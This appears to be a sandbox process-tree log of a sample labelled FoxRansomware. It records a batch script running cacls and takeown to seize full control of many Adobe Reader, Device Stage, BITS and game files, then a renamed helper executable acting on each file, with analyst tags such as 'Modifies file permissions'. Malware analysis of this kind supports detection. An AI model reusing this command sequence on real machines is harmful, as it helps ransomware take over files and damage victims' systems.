C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:5944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "resource.xml" -nobanner4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:3032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "email_all.gif" -nobanner3⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "email_all.gif" -nobanner4⤵PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:5196
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:5136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:2628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:2844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵
- Modifies file permissions
PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "rss.gif" -nobanner3⤵PID:2224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "rss.gif" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:2252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵
- Modifies file permissions
PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:3064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:2836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:1316
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:2428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:3112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:2360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "SY______.PFM" -nobanner3⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "SY______.PFM" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:3192
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:2680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:2444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:2440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:2056
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:2184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "can129.hsp" -nobanner3⤵PID:3988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "can129.hsp" -nobanner4⤵PID:3288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:2916
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:3260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵
- Modifies file permissions
PID:3996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:3280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:3520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:4056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:2552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:2768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3140
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "background.png" -nobanner4⤵PID:2748
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:1508
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:3180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner3⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "tasks.xml" -nobanner4⤵PID:1724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:4028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:4072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:4472
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:4648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:4724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:4732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "license.html" -nobanner3⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "license.html" -nobanner4⤵PID:3460
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""2⤵PID:4588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C3⤵PID:3348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner3⤵PID:4032
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner4⤵PID:4444
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""2⤵PID:5740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C3⤵PID:3352
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner3⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner4⤵PID:5572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:5616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:4560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:3728
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:5620
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:3320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:5596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "forms_received.gif" -nobanner4⤵PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:5232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:5756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:3852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:3172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:3248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "submission_history.gif" -nobanner3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "submission_history.gif" -nobanner4⤵PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:3220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Identity-H" -nobanner3⤵PID:3832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "Identity-H" -nobanner4⤵PID:3828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:5812
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:5836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:5876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:5872
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:5884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:5956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:5828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:5636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:4128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:4208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:4140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:4252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt32.clx" -nobanner3⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula "brt32.clx" -nobanner4⤵PID:4456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exeD22bUU4y.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:2436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:4272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵
